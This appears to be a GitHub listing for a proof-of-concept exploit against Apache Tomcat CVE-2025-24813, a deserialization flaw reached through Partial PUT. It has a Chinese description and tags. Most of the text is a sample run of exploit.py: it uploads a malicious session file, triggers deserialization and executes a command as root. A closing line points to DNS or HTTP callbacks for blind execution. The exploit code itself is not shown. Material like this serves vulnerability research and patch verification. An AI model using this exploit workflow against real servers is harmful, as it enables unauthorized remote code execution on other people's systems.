gunyakit/CVE-2025-24813-PoC-exploit

GitHub: gunyakit/CVE-2025-24813-PoC-exploit

Apache Tomcat CVE-2025-24813 反序列化 RCE 漏洞的 PoC 利用工具,通过 Partial PUT 上传恶意序列化 payload 实现远程代码执行。

Stars: 0 | Forks: 0

# CVE-2025-24813-PoC-exploit Apache Tomcat 反序列化 RCE ``` ❯ python3 exploit.py http://localhost:8080/ "id" ============================================================ CVE-2025-24813 - Apache Tomcat Partial PUT RCE ============================================================ [*] Target: http://localhost:8080 [*] Command: id [*] Creating exploit payload... [*] Uploading payload via PUT to: http://localhost:8080/session/exploit.session [*] PUT Response: 201 [+] Payload uploaded successfully! [*] Triggering deserialization... [*] Trigger Response: 200 [*] Response body: Deserialization Triggered!

⚠️ Deserialization RCE Triggered!

Session file deserialized: exploit.session

Command executed: id



uid=0(root) gid=0(root) groups=0(root)



[*] Exploit complete! If deserialization worked, check target for command execution. For blind RCE, use out-of-band techniques (DNS/HTTP callbacks) ```
标签:Apache Tomcat, CISA项目, CVE-2025-24813, Maven, Partial PUT, PoC, RCE, Web安全, Web报告查看器, 反序列化漏洞, 攻击脚本, 数据展示, 暴力破解, 漏洞验证, 红队, 编程工具, 网络安全, 蓝队分析, 远程代码执行, 隐私保护, 高危漏洞